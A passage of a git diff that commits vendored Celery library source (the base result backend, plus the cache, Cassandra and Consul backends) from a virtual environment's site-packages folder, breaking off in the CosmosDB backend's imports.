+ accept=self.accept) + + def prepare_expires(self, value, type=None): + if value is None: + value = self.app.conf.result_expires + if isinstance(value, timedelta): + value = value.total_seconds() + if value is not None and type: + return type(value) + return value + + def prepare_persistent(self, enabled=None): + if enabled is not None: + return enabled + persistent = self.app.conf.result_persistent + return self.persistent if persistent is None else persistent + + def encode_result(self, result, state): + if state in self.EXCEPTION_STATES and isinstance(result, Exception): + return self.prepare_exception(result) + return self.prepare_value(result) + + def is_cached(self, task_id): + return task_id in self._cache + + def _get_result_meta(self, result, + state, traceback, request, format_date=True, + encode=False): + if state in self.READY_STATES: + date_done = datetime.utcnow() + if format_date: + date_done = date_done.isoformat() + else: + date_done = None + + meta = { + 'status': state, + 'result': result, + 'traceback': traceback, + 'children': self.current_task_children(request), + 'date_done': date_done, + } + + if request and getattr(request, 'group', None): + meta['group_id'] = request.group + if request and getattr(request, 'parent_id', None): + meta['parent_id'] = request.parent_id + + if self.app.conf.find_value_for_key('extended', 'result'): + if request: + request_meta = { + 'name': getattr(request, 'task', None), + 'args': getattr(request, 'args', None), + 'kwargs': getattr(request, 'kwargs', None), + 'worker': getattr(request, 'hostname', None), + 'retries': getattr(request, 'retries', None), + 'queue': request.delivery_info.get('routing_key') + if hasattr(request, 'delivery_info') and + request.delivery_info else None, + } + if getattr(request, 'stamps', None): + request_meta['stamped_headers'] = request.stamped_headers + request_meta.update(request.stamps) + + if encode: + # args and kwargs need to be encoded properly before saving + encode_needed_fields = {"args", "kwargs"} + for field in encode_needed_fields: + value = request_meta[field] + encoded_value = self.encode(value) + request_meta[field] = ensure_bytes(encoded_value) + + meta.update(request_meta) + + return meta + + def _sleep(self, amount): + time.sleep(amount) + + def store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Update task state and result. + + if always_retry_backend_operation is activated, in the event of a recoverable exception, + then retry operation with an exponential backoff until a limit has been reached. + """ + result = self.encode_result(result, state) + + retries = 0 + + while True: + try: + self._store_result(task_id, result, state, traceback, + request=request, **kwargs) + return result + except Exception as exc: + if self.always_retry and self.exception_safe_to_retry(exc): + if retries < self.max_retries: + retries += 1 + + # get_exponential_backoff_interval computes integers + # and time.sleep accept floats for sub second sleep + sleep_amount = get_exponential_backoff_interval( + self.base_sleep_between_retries_ms, retries, + self.max_sleep_between_retries_ms, True) / 1000 + self._sleep(sleep_amount) + else: + raise_with_context( + BackendStoreError("failed to store result on the backend", task_id=task_id, state=state), + ) + else: + raise + + def forget(self, task_id): + self._cache.pop(task_id, None) + self._forget(task_id) + + def _forget(self, task_id): + raise NotImplementedError('backend does not implement forget.') + + def get_state(self, task_id): + """Get the state of a task.""" + return self.get_task_meta(task_id)['status'] + + get_status = get_state # XXX compat + + def get_traceback(self, task_id): + """Get the traceback for a failed task.""" + return self.get_task_meta(task_id).get('traceback') + + def get_result(self, task_id): + """Get the result of a task.""" + return self.get_task_meta(task_id).get('result') + + def get_children(self, task_id): + """Get the list of subtasks sent by a task.""" + try: + return self.get_task_meta(task_id)['children'] + except KeyError: + pass + + def _ensure_not_eager(self): + if self.app.conf.task_always_eager and not self.app.conf.task_store_eager_result: + warnings.warn( + "Results are not stored in backend and should not be retrieved when " + "task_always_eager is enabled, unless task_store_eager_result is enabled.", + RuntimeWarning + ) + + def exception_safe_to_retry(self, exc): + """Check if an exception is safe to retry. + + Backends have to overload this method with correct predicates dealing with their exceptions. + + By default no exception is safe to retry, it's up to backend implementation + to define which exceptions are safe. + """ + return False + + def get_task_meta(self, task_id, cache=True): + """Get task meta from backend. + + if always_retry_backend_operation is activated, in the event of a recoverable exception, + then retry operation with an exponential backoff until a limit has been reached. + """ + self._ensure_not_eager() + if cache: + try: + return self._cache[task_id] + except KeyError: + pass + retries = 0 + while True: + try: + meta = self._get_task_meta_for(task_id) + break + except Exception as exc: + if self.always_retry and self.exception_safe_to_retry(exc): + if retries < self.max_retries: + retries += 1 + + # get_exponential_backoff_interval computes integers + # and time.sleep accept floats for sub second sleep + sleep_amount = get_exponential_backoff_interval( + self.base_sleep_between_retries_ms, retries, + self.max_sleep_between_retries_ms, True) / 1000 + self._sleep(sleep_amount) + else: + raise_with_context( + BackendGetMetaError("failed to get meta", task_id=task_id), + ) + else: + raise + + if cache and meta.get('status') == states.SUCCESS: + self._cache[task_id] = meta + return meta + + def reload_task_result(self, task_id): + """Reload task result, even if it has been previously fetched.""" + self._cache[task_id] = self.get_task_meta(task_id, cache=False) + + def reload_group_result(self, group_id): + """Reload group result, even if it has been previously fetched.""" + self._cache[group_id] = self.get_group_meta(group_id, cache=False) + + def get_group_meta(self, group_id, cache=True): + self._ensure_not_eager() + if cache: + try: + return self._cache[group_id] + except KeyError: + pass + + meta = self._restore_group(group_id) + if cache and meta is not None: + self._cache[group_id] = meta + return meta + + def restore_group(self, group_id, cache=True): + """Get the result for a group.""" + meta = self.get_group_meta(group_id, cache=cache) + if meta: + return meta['result'] + + def save_group(self, group_id, result): + """Store the result of an executed group.""" + return self._save_group(group_id, result) + + def delete_group(self, group_id): + self._cache.pop(group_id, None) + return self._delete_group(group_id) + + def cleanup(self): + """Backend cleanup.""" + + def process_cleanup(self): + """Cleanup actions to do at the end of a task worker process.""" + + def on_task_call(self, producer, task_id): + return {} + + def add_to_chord(self, chord_id, result): + raise NotImplementedError('Backend does not support add_to_chord') + + def on_chord_part_return(self, request, state, result, **kwargs): + pass + + def set_chord_size(self, group_id, chord_size): + pass + + def fallback_chord_unlock(self, header_result, body, countdown=1, + **kwargs): + kwargs['result'] = [r.as_tuple() for r in header_result] + try: + body_type = getattr(body, 'type', None) + except NotRegistered: + body_type = None + + queue = body.options.get('queue', getattr(body_type, 'queue', None)) + + if queue is None: + # fallback to default routing if queue name was not + # explicitly passed to body callback + queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name + + priority = body.options.get('priority', getattr(body_type, 'priority', 0)) + self.app.tasks['celery.chord_unlock'].apply_async( + (header_result.id, body,), kwargs, + countdown=countdown, + queue=queue, + priority=priority, + ) + + def ensure_chords_allowed(self): + pass + + def apply_chord(self, header_result_args, body, **kwargs): + self.ensure_chords_allowed() + header_result = self.app.GroupResult(*header_result_args) + self.fallback_chord_unlock(header_result, body, **kwargs) + + def current_task_children(self, request=None): + request = request or getattr(get_current_task(), 'request', None) + if request: + return [r.as_tuple() for r in getattr(request, 'children', [])] + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return (unpickle_backend, (self.__class__, args, kwargs)) + + +class SyncBackendMixin: + def iter_native(self, result, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None): + self._ensure_not_eager() + results = result.results + if not results: + return + + task_ids = set() + for result in results: + if isinstance(result, ResultSet): + yield result.id, result.results + else: + task_ids.add(result.id) + + yield from self.get_many( + task_ids, + timeout=timeout, interval=interval, no_ack=no_ack, + on_message=on_message, on_interval=on_interval, + ) + + def wait_for_pending(self, result, timeout=None, interval=0.5, + no_ack=True, on_message=None, on_interval=None, + callback=None, propagate=True): + self._ensure_not_eager() + if on_message is not None: + raise ImproperlyConfigured( + 'Backend does not support on_message callback') + + meta = self.wait_for( + result.id, timeout=timeout, + interval=interval, + on_interval=on_interval, + no_ack=no_ack, + ) + if meta: + result._maybe_set_cache(meta) + return result.maybe_throw(propagate=propagate, callback=callback) + + def wait_for(self, task_id, + timeout=None, interval=0.5, no_ack=True, on_interval=None): + """Wait for task and return its result. + + If the task raises an exception, this exception + will be re-raised by :func:`wait_for`. + + Raises: + celery.exceptions.TimeoutError: + If `timeout` is not :const:`None`, and the operation + takes longer than `timeout` seconds. + """ + self._ensure_not_eager() + + time_elapsed = 0.0 + + while 1: + meta = self.get_task_meta(task_id) + if meta['status'] in states.READY_STATES: + return meta + if on_interval: + on_interval() + # avoid hammering the CPU checking status. + time.sleep(interval) + time_elapsed += interval + if timeout and time_elapsed >= timeout: + raise TimeoutError('The operation timed out.') + + def add_pending_result(self, result, weak=False): + return result + + def remove_pending_result(self, result): + return result + + @property + def is_async(self): + return False + + +class BaseBackend(Backend, SyncBackendMixin): + """Base (synchronous) result backend.""" + + +BaseDictBackend = BaseBackend # XXX compat + + +class BaseKeyValueStoreBackend(Backend): + key_t = ensure_bytes + task_keyprefix = 'celery-task-meta-' + group_keyprefix = 'celery-taskset-meta-' + chord_keyprefix = 'chord-unlock-' + implements_incr = False + + def __init__(self, *args, **kwargs): + if hasattr(self.key_t, '__func__'): # pragma: no cover + self.key_t = self.key_t.__func__ # remove binding + super().__init__(*args, **kwargs) + self._add_global_keyprefix() + self._encode_prefixes() + if self.implements_incr: + self.apply_chord = self._apply_chord_incr + + def _add_global_keyprefix(self): + """ + This method prepends the global keyprefix to the existing keyprefixes. + + This method checks if a global keyprefix is configured in `result_backend_transport_options` using the + `global_keyprefix` key. If so, then it is prepended to the task, group and chord key prefixes. + """ + global_keyprefix = self.app.conf.get('result_backend_transport_options', {}).get("global_keyprefix", None) + if global_keyprefix: + self.task_keyprefix = f"{global_keyprefix}_{self.task_keyprefix}" + self.group_keyprefix = f"{global_keyprefix}_{self.group_keyprefix}" + self.chord_keyprefix = f"{global_keyprefix}_{self.chord_keyprefix}" + + def _encode_prefixes(self): + self.task_keyprefix = self.key_t(self.task_keyprefix) + self.group_keyprefix = self.key_t(self.group_keyprefix) + self.chord_keyprefix = self.key_t(self.chord_keyprefix) + + def get(self, key): + raise NotImplementedError('Must implement the get method.') + + def mget(self, keys): + raise NotImplementedError('Does not support get_many') + + def _set_with_state(self, key, value, state): + return self.set(key, value) + + def set(self, key, value): + raise NotImplementedError('Must implement the set method.') + + def delete(self, key): + raise NotImplementedError('Must implement the delete method') + + def incr(self, key): + raise NotImplementedError('Does not implement incr') + + def expire(self, key, value): + pass + + def get_key_for_task(self, task_id, key=''): + """Get the cache key for a task by id.""" + if not task_id: + raise ValueError(f'task_id must not be empty. Got {task_id} instead.') + return self._get_key_for(self.task_keyprefix, task_id, key) + + def get_key_for_group(self, group_id, key=''): + """Get the cache key for a group by id.""" + if not group_id: + raise ValueError(f'group_id must not be empty. Got {group_id} instead.') + return self._get_key_for(self.group_keyprefix, group_id, key) + + def get_key_for_chord(self, group_id, key=''): + """Get the cache key for the chord waiting on group with given id.""" + if not group_id: + raise ValueError(f'group_id must not be empty. Got {group_id} instead.') + return self._get_key_for(self.chord_keyprefix, group_id, key) + + def _get_key_for(self, prefix, id, key=''): + key_t = self.key_t + + return key_t('').join([ + prefix, key_t(id), key_t(key), + ]) + + def _strip_prefix(self, key): + """Take bytes: emit string.""" + key = self.key_t(key) + for prefix in self.task_keyprefix, self.group_keyprefix: + if key.startswith(prefix): + return bytes_to_str(key[len(prefix):]) + return bytes_to_str(key) + + def _filter_ready(self, values, READY_STATES=states.READY_STATES): + for k, value in values: + if value is not None: + value = self.decode_result(value) + if value['status'] in READY_STATES: + yield k, value + + def _mget_to_results(self, values, keys, READY_STATES=states.READY_STATES): + if hasattr(values, 'items'): + # client returns dict so mapping preserved. + return { + self._strip_prefix(k): v + for k, v in self._filter_ready(values.items(), READY_STATES) + } + else: + # client returns list so need to recreate mapping. + return { + bytes_to_str(keys[i]): v + for i, v in self._filter_ready(enumerate(values), READY_STATES) + } + + def get_many(self, task_ids, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None, max_iterations=None, + READY_STATES=states.READY_STATES): + interval = 0.5 if interval is None else interval + ids = task_ids if isinstance(task_ids, set) else set(task_ids) + cached_ids = set() + cache = self._cache + for task_id in ids: + try: + cached = cache[task_id] + except KeyError: + pass + else: + if cached['status'] in READY_STATES: + yield bytes_to_str(task_id), cached + cached_ids.add(task_id) + + ids.difference_update(cached_ids) + iterations = 0 + while ids: + keys = list(ids) + r = self._mget_to_results(self.mget([self.get_key_for_task(k) + for k in keys]), keys, READY_STATES) + cache.update(r) + ids.difference_update({bytes_to_str(v) for v in r}) + for key, value in r.items(): + if on_message is not None: + on_message(value) + yield bytes_to_str(key), value + if timeout and iterations * interval >= timeout: + raise TimeoutError(f'Operation timed out ({timeout})') + if on_interval: + on_interval() + time.sleep(interval) # don't busy loop. + iterations += 1 + if max_iterations and iterations >= max_iterations: + break + + def _forget(self, task_id): + self.delete(self.get_key_for_task(task_id)) + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + meta = self._get_result_meta(result=result, state=state, + traceback=traceback, request=request) + meta['task_id'] = bytes_to_str(task_id) + + # Retrieve metadata from the backend, if the status + # is a success then we ignore any following update to the state. + # This solves a task deduplication issue because of network + # partitioning or lost workers. This issue involved a race condition + # making a lost task overwrite the last successful result in the + # result backend. + current_meta = self._get_task_meta_for(task_id) + + if current_meta['status'] == states.SUCCESS: + return result + + try: + self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state) + except BackendStoreError as ex: + raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex + + return result + + def _save_group(self, group_id, result): + self._set_with_state(self.get_key_for_group(group_id), + self.encode({'result': result.as_tuple()}), states.SUCCESS) + return result + + def _delete_group(self, group_id): + self.delete(self.get_key_for_group(group_id)) + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + meta = self.get(self.get_key_for_task(task_id)) + if not meta: + return {'status': states.PENDING, 'result': None} + return self.decode_result(meta) + + def _restore_group(self, group_id): + """Get task meta-data for a task by id.""" + meta = self.get(self.get_key_for_group(group_id)) + # previously this was always pickled, but later this + # was extended to support other serializers, so the + # structure is kind of weird. + if meta: + meta = self.decode(meta) + result = meta['result'] + meta['result'] = result_from_tuple(result, self.app) + return meta + + def _apply_chord_incr(self, header_result_args, body, **kwargs): + self.ensure_chords_allowed() + header_result = self.app.GroupResult(*header_result_args) + header_result.save(backend=self) + + def on_chord_part_return(self, request, state, result, **kwargs): + if not self.implements_incr: + return + app = self.app + gid = request.group + if not gid: + return + key = self.get_key_for_chord(gid) + try: + deps = GroupResult.restore(gid, backend=self) + except Exception as exc: # pylint: disable=broad-except + callback = maybe_signature(request.chord, app=app) + logger.exception('Chord %r raised: %r', gid, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Cannot restore group: {exc!r}'), + ) + if deps is None: + try: + raise ValueError(gid) + except ValueError as exc: + callback = maybe_signature(request.chord, app=app) + logger.exception('Chord callback %r raised: %r', gid, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'GroupResult {gid} no longer exists'), + ) + val = self.incr(key) + # Set the chord size to the value defined in the request, or fall back + # to the number of dependencies we can see from the restored result + size = request.chord.get("chord_size") + if size is None: + size = len(deps) + if val > size: # pragma: no cover + logger.warning('Chord counter incremented too many times for %r', + gid) + elif val == size: + callback = maybe_signature(request.chord, app=app) + j = deps.join_native if deps.supports_native_join else deps.join + try: + with allow_join_result(): + ret = j( + timeout=app.conf.result_chord_join_timeout, + propagate=True) + except Exception as exc: # pylint: disable=broad-except + try: + culprit = next(deps._failed_join_report()) + reason = 'Dependency {0.id} raised {1!r}'.format( + culprit, exc, + ) + except StopIteration: + reason = repr(exc) + + logger.exception('Chord %r raised: %r', gid, reason) + self.chord_error_from_stack(callback, ChordError(reason)) + else: + try: + callback.delay(ret) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', gid, exc) + self.chord_error_from_stack( + callback, + ChordError(f'Callback error: {exc!r}'), + ) + finally: + deps.delete() + self.client.delete(key) + else: + self.expire(key, self.expires) + + +class KeyValueStoreBackend(BaseKeyValueStoreBackend, SyncBackendMixin): + """Result backend base class for key/value stores.""" + + +class DisabledBackend(BaseBackend): + """Dummy result backend.""" + + _cache = {} # need this attribute to reset cache in tests. + + def store_result(self, *args, **kwargs): + pass + + def ensure_chords_allowed(self): + raise NotImplementedError(E_CHORD_NO_BACKEND.strip()) + + def _is_disabled(self, *args, **kwargs): + raise NotImplementedError(E_NO_BACKEND.strip()) + + def as_uri(self, *args, **kwargs): + return 'disabled://' + + get_state = get_status = get_result = get_traceback = _is_disabled + get_task_meta_for = wait_for = get_many = _is_disabled diff --git a/env/Lib/site-packages/celery/backends/cache.py b/env/Lib/site-packages/celery/backends/cache.py new file mode 100644 index 00000000..ad79383c --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cache.py @@ -0,0 +1,163 @@ +"""Memcached and in-memory cache result backend.""" +from kombu.utils.encoding import bytes_to_str, ensure_bytes +from kombu.utils.objects import cached_property + +from celery.exceptions import ImproperlyConfigured +from celery.utils.functional import LRUCache + +from .base import KeyValueStoreBackend + +__all__ = ('CacheBackend',) + +_imp = [None] + +REQUIRES_BACKEND = """\ +The Memcached backend requires either pylibmc or python-memcached.\ +""" + +UNKNOWN_BACKEND = """\ +The cache backend {0!r} is unknown, +Please use one of the following backends instead: {1}\ +""" + +# Global shared in-memory cache for in-memory cache client +# This is to share cache between threads +_DUMMY_CLIENT_CACHE = LRUCache(limit=5000) + + +def import_best_memcache(): + if _imp[0] is None: + is_pylibmc, memcache_key_t = False, bytes_to_str + try: + import pylibmc as memcache + is_pylibmc = True + except ImportError: + try: + import memcache + except ImportError: + raise ImproperlyConfigured(REQUIRES_BACKEND) + _imp[0] = (is_pylibmc, memcache, memcache_key_t) + return _imp[0] + + +def get_best_memcache(*args, **kwargs): + # pylint: disable=unpacking-non-sequence + # This is most definitely a sequence, but pylint thinks it's not. + is_pylibmc, memcache, key_t = import_best_memcache() + Client = _Client = memcache.Client + + if not is_pylibmc: + def Client(*args, **kwargs): # noqa: F811 + kwargs.pop('behaviors', None) + return _Client(*args, **kwargs) + + return Client, key_t + + +class DummyClient: + + def __init__(self, *args, **kwargs): + self.cache = _DUMMY_CLIENT_CACHE + + def get(self, key, *args, **kwargs): + return self.cache.get(key) + + def get_multi(self, keys): + cache = self.cache + return {k: cache[k] for k in keys if k in cache} + + def set(self, key, value, *args, **kwargs): + self.cache[key] = value + + def delete(self, key, *args, **kwargs): + self.cache.pop(key, None) + + def incr(self, key, delta=1): + return self.cache.incr(key, delta) + + def touch(self, key, expire): + pass + + +backends = { + 'memcache': get_best_memcache, + 'memcached': get_best_memcache, + 'pylibmc': get_best_memcache, + 'memory': lambda: (DummyClient, ensure_bytes), +} + + +class CacheBackend(KeyValueStoreBackend): + """Cache result backend.""" + + servers = None + supports_autoexpire = True + supports_native_join = True + implements_incr = True + + def __init__(self, app, expires=None, backend=None, + options=None, url=None, **kwargs): + options = {} if not options else options + super().__init__(app, **kwargs) + self.url = url + + self.options = dict(self.app.conf.cache_backend_options, + **options) + + self.backend = url or backend or self.app.conf.cache_backend + if self.backend: + self.backend, _, servers = self.backend.partition('://') + self.servers = servers.rstrip('/').split(';') + self.expires = self.prepare_expires(expires, type=int) + try: + self.Client, self.key_t = backends[self.backend]() + except KeyError: + raise ImproperlyConfigured(UNKNOWN_BACKEND.format( + self.backend, ', '.join(backends))) + self._encode_prefixes() # rencode the keyprefixes + + def get(self, key): + return self.client.get(key) + + def mget(self, keys): + return self.client.get_multi(keys) + + def set(self, key, value): + return self.client.set(key, value, self.expires) + + def delete(self, key): + return self.client.delete(key) + + def _apply_chord_incr(self, header_result_args, body, **kwargs): + chord_key = self.get_key_for_chord(header_result_args[0]) + self.client.set(chord_key, 0, time=self.expires) + return super()._apply_chord_incr( + header_result_args, body, **kwargs) + + def incr(self, key): + return self.client.incr(key) + + def expire(self, key, value): + return self.client.touch(key, value) + + @cached_property + def client(self): + return self.Client(self.servers, **self.options) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + servers = ';'.join(self.servers) + backend = f'{self.backend}://{servers}/' + kwargs.update( + {'backend': backend, + 'expires': self.expires, + 'options': self.options}) + return super().__reduce__(args, kwargs) + + def as_uri(self, *args, **kwargs): + """Return the backend as an URI. + + This properly handles the case of multiple servers. + """ + servers = ';'.join(self.servers) + return f'{self.backend}://{servers}/' diff --git a/env/Lib/site-packages/celery/backends/cassandra.py b/env/Lib/site-packages/celery/backends/cassandra.py new file mode 100644 index 00000000..0eb37f31 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cassandra.py @@ -0,0 +1,256 @@ +"""Apache Cassandra result store backend using the DataStax driver.""" +import threading + +from celery import states +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import BaseBackend + +try: # pragma: no cover + import cassandra + import cassandra.auth + import cassandra.cluster + import cassandra.query +except ImportError: + cassandra = None + + +__all__ = ('CassandraBackend',) + +logger = get_logger(__name__) + +E_NO_CASSANDRA = """ +You need to install the cassandra-driver library to +use the Cassandra backend. See https://github.com/datastax/python-driver +""" + +E_NO_SUCH_CASSANDRA_AUTH_PROVIDER = """ +CASSANDRA_AUTH_PROVIDER you provided is not a valid auth_provider class. +See https://datastax.github.io/python-driver/api/cassandra/auth.html. +""" + +E_CASSANDRA_MISCONFIGURED = 'Cassandra backend improperly configured.' + +E_CASSANDRA_NOT_CONFIGURED = 'Cassandra backend not configured.' + +Q_INSERT_RESULT = """ +INSERT INTO {table} ( + task_id, status, result, date_done, traceback, children) VALUES ( + %s, %s, %s, %s, %s, %s) {expires}; +""" + +Q_SELECT_RESULT = """ +SELECT status, result, date_done, traceback, children +FROM {table} +WHERE task_id=%s +LIMIT 1 +""" + +Q_CREATE_RESULT_TABLE = """ +CREATE TABLE {table} ( + task_id text, + status text, + result blob, + date_done timestamp, + traceback blob, + children blob, + PRIMARY KEY ((task_id), date_done) +) WITH CLUSTERING ORDER BY (date_done DESC); +""" + +Q_EXPIRES = """ + USING TTL {0} +""" + + +def buf_t(x): + return bytes(x, 'utf8') + + +class CassandraBackend(BaseBackend): + """Cassandra/AstraDB backend utilizing DataStax driver. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`cassandra-driver` is not available, + or not-exactly-one of the :setting:`cassandra_servers` and + the :setting:`cassandra_secure_bundle_path` settings is set. + """ + + #: List of Cassandra servers with format: ``hostname``. + servers = None + #: Location of the secure connect bundle zipfile (absolute path). + bundle_path = None + + supports_autoexpire = True # autoexpire supported via entry_ttl + + def __init__(self, servers=None, keyspace=None, table=None, entry_ttl=None, + port=9042, bundle_path=None, **kwargs): + super().__init__(**kwargs) + + if not cassandra: + raise ImproperlyConfigured(E_NO_CASSANDRA) + + conf = self.app.conf + self.servers = servers or conf.get('cassandra_servers', None) + self.bundle_path = bundle_path or conf.get( + 'cassandra_secure_bundle_path', None) + self.port = port or conf.get('cassandra_port', None) + self.keyspace = keyspace or conf.get('cassandra_keyspace', None) + self.table = table or conf.get('cassandra_table', None) + self.cassandra_options = conf.get('cassandra_options', {}) + + # either servers or bundle path must be provided... + db_directions = self.servers or self.bundle_path + if not db_directions or not self.keyspace or not self.table: + raise ImproperlyConfigured(E_CASSANDRA_NOT_CONFIGURED) + # ...but not both: + if self.servers and self.bundle_path: + raise ImproperlyConfigured(E_CASSANDRA_MISCONFIGURED) + + expires = entry_ttl or conf.get('cassandra_entry_ttl', None) + + self.cqlexpires = ( + Q_EXPIRES.format(expires) if expires is not None else '') + + read_cons = conf.get('cassandra_read_consistency') or 'LOCAL_QUORUM' + write_cons = conf.get('cassandra_write_consistency') or 'LOCAL_QUORUM' + + self.read_consistency = getattr( + cassandra.ConsistencyLevel, read_cons, + cassandra.ConsistencyLevel.LOCAL_QUORUM) + self.write_consistency = getattr( + cassandra.ConsistencyLevel, write_cons, + cassandra.ConsistencyLevel.LOCAL_QUORUM) + + self.auth_provider = None + auth_provider = conf.get('cassandra_auth_provider', None) + auth_kwargs = conf.get('cassandra_auth_kwargs', None) + if auth_provider and auth_kwargs: + auth_provider_class = getattr(cassandra.auth, auth_provider, None) + if not auth_provider_class: + raise ImproperlyConfigured(E_NO_SUCH_CASSANDRA_AUTH_PROVIDER) + self.auth_provider = auth_provider_class(**auth_kwargs) + + self._cluster = None + self._session = None + self._write_stmt = None + self._read_stmt = None + self._lock = threading.RLock() + + def _get_connection(self, write=False): + """Prepare the connection for action. + + Arguments: + write (bool): are we a writer? + """ + if self._session is not None: + return + self._lock.acquire() + try: + if self._session is not None: + return + # using either 'servers' or 'bundle_path' here: + if self.servers: + self._cluster = cassandra.cluster.Cluster( + self.servers, port=self.port, + auth_provider=self.auth_provider, + **self.cassandra_options) + else: + # 'bundle_path' is guaranteed to be set + self._cluster = cassandra.cluster.Cluster( + cloud={ + 'secure_connect_bundle': self.bundle_path, + }, + auth_provider=self.auth_provider, + **self.cassandra_options) + self._session = self._cluster.connect(self.keyspace) + + # We're forced to do concatenation below, as formatting would + # blow up on superficial %s that'll be processed by Cassandra + self._write_stmt = cassandra.query.SimpleStatement( + Q_INSERT_RESULT.format( + table=self.table, expires=self.cqlexpires), + ) + self._write_stmt.consistency_level = self.write_consistency + + self._read_stmt = cassandra.query.SimpleStatement( + Q_SELECT_RESULT.format(table=self.table), + ) + self._read_stmt.consistency_level = self.read_consistency + + if write: + # Only possible writers "workers" are allowed to issue + # CREATE TABLE. This is to prevent conflicting situations + # where both task-creator and task-executor would issue it + # at the same time. + + # Anyway; if you're doing anything critical, you should + # have created this table in advance, in which case + # this query will be a no-op (AlreadyExists) + make_stmt = cassandra.query.SimpleStatement( + Q_CREATE_RESULT_TABLE.format(table=self.table), + ) + make_stmt.consistency_level = self.write_consistency + + try: + self._session.execute(make_stmt) + except cassandra.AlreadyExists: + pass + + except cassandra.OperationTimedOut: + # a heavily loaded or gone Cassandra cluster failed to respond. + # leave this class in a consistent state + if self._cluster is not None: + self._cluster.shutdown() # also shuts down _session + + self._cluster = None + self._session = None + raise # we did fail after all - reraise + finally: + self._lock.release() + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Store return value and state of an executed task.""" + self._get_connection(write=True) + + self._session.execute(self._write_stmt, ( + task_id, + state, + buf_t(self.encode(result)), + self.app.now(), + buf_t(self.encode(traceback)), + buf_t(self.encode(self.current_task_children(request))) + )) + + def as_uri(self, include_password=True): + return 'cassandra://' + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + self._get_connection() + + res = self._session.execute(self._read_stmt, (task_id, )).one() + if not res: + return {'status': states.PENDING, 'result': None} + + status, result, date_done, traceback, children = res + + return self.meta_from_decoded({ + 'task_id': task_id, + 'status': status, + 'result': self.decode(result), + 'date_done': date_done, + 'traceback': self.decode(traceback), + 'children': self.decode(children), + }) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + kwargs.update( + {'servers': self.servers, + 'keyspace': self.keyspace, + 'table': self.table}) + return super().__reduce__(args, kwargs) diff --git a/env/Lib/site-packages/celery/backends/consul.py b/env/Lib/site-packages/celery/backends/consul.py new file mode 100644 index 00000000..a4ab1484 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/consul.py @@ -0,0 +1,116 @@ +"""Consul result store backend. + +- :class:`ConsulBackend` implements KeyValueStoreBackend to store results + in the key-value store of Consul. +""" +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import parse_url + +from celery.backends.base import KeyValueStoreBackend +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +try: + import consul +except ImportError: + consul = None + +logger = get_logger(__name__) + +__all__ = ('ConsulBackend',) + +CONSUL_MISSING = """\ +You need to install the python-consul library in order to use \ +the Consul result store backend.""" + + +class ConsulBackend(KeyValueStoreBackend): + """Consul.io K/V store backend for Celery.""" + + consul = consul + + supports_autoexpire = True + + consistency = 'consistent' + path = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + if self.consul is None: + raise ImproperlyConfigured(CONSUL_MISSING) + # + # By default, for correctness, we use a client connection per + # operation. If set, self.one_client will be used for all operations. + # This provides for the original behaviour to be selected, and is + # also convenient for mocking in the unit tests. + # + self.one_client = None + self._init_from_params(**parse_url(self.url)) + + def _init_from_params(self, hostname, port, virtual_host, **params): + logger.debug('Setting on Consul client to connect to %s:%d', + hostname, port) + self.path = virtual_host + self.hostname = hostname + self.port = port + # + # Optionally, allow a single client connection to be used to reduce + # the connection load on Consul by adding a "one_client=1" parameter + # to the URL. + # + if params.get('one_client', None): + self.one_client = self.client() + + def client(self): + return self.one_client or consul.Consul(host=self.hostname, + port=self.port, + consistency=self.consistency) + + def _key_to_consul_key(self, key): + key = bytes_to_str(key) + return key if self.path is None else f'{self.path}/{key}' + + def get(self, key): + key = self._key_to_consul_key(key) + logger.debug('Trying to fetch key %s from Consul', key) + try: + _, data = self.client().kv.get(key) + return data['Value'] + except TypeError: + pass + + def mget(self, keys): + for key in keys: + yield self.get(key) + + def set(self, key, value): + """Set a key in Consul. + + Before creating the key it will create a session inside Consul + where it creates a session with a TTL + + The key created afterwards will reference to the session's ID. + + If the session expires it will remove the key so that results + can auto expire from the K/V store + """ + session_name = bytes_to_str(key) + + key = self._key_to_consul_key(key) + + logger.debug('Trying to create Consul session %s with TTL %d', + session_name, self.expires) + client = self.client() + session_id = client.session.create(name=session_name, + behavior='delete', + ttl=self.expires) + logger.debug('Created Consul session %s', session_id) + + logger.debug('Writing key %s to Consul', key) + return client.kv.put(key=key, value=value, acquire=session_id) + + def delete(self, key): + key = self._key_to_consul_key(key) + logger.debug('Removing key %s from Consul', key) + return self.client().kv.delete(key) diff --git a/env/Lib/site-packages/celery/backends/cosmosdbsql.py b/env/Lib/site-packages/celery/backends/cosmosdbsql.py new file mode 100644 index 00000000..e32b13f2 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cosmosdbsql.py @@ -0,0 +1,218 @@ +"""The CosmosDB/SQL backend for Celery (experimental).""" +from kombu.utils import cached_property +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import pydocumentdb + from pydocumentdb.document_client import DocumentClient + from pydocumentdb.documents import ConnectionPolicy, ConsistencyLevel, PartitionKind + from pydocumentdb.errors import HTTPFailure + from 